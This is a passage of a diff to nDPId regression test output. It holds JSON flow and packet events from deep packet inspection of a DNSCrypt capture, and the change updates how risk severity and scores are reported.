 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylNAAL0RDRIKAAABaO66wJrnAbsCCOaEZFYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylVAAL0RDRAKAAABaO66wOd9AbsCCOaEZFQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylYgAL0RKU8KAAABaO66wOj5AbsGBMBOZFcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylQgAL0RKVEKAAABaO66wK3LAbsGBPuAZFMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylQAub0RTiQKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":48,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylYAub0RTiIKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -123,26 +123,26 @@
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739304399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739304399,"pkt":"ZmZmZmZmRERERERECABFAADUET5AADQRUHBo7rrACgAAAQG76PkAwCm6ZFeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAhKdWfhZK3D+gyCT1iixW\/FSRGoXDftkwga2BkZlttUlKSV94EyK2+BzaupeI4vEl+rXXsyVAmoCDcu2+5DAsD7Asxq95SKQwdQwh70VVdkKEIfYOFTawzG9XuIku9iynsCzGr3lIpDAAAAAFfU3cYX1TImA=="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhNAAL0R0ewKAAAB0frxGYAZAbsCCIXq8VkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhQgAL0R7isKAAAB0frxGdrjAbsGBM5Z8VQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA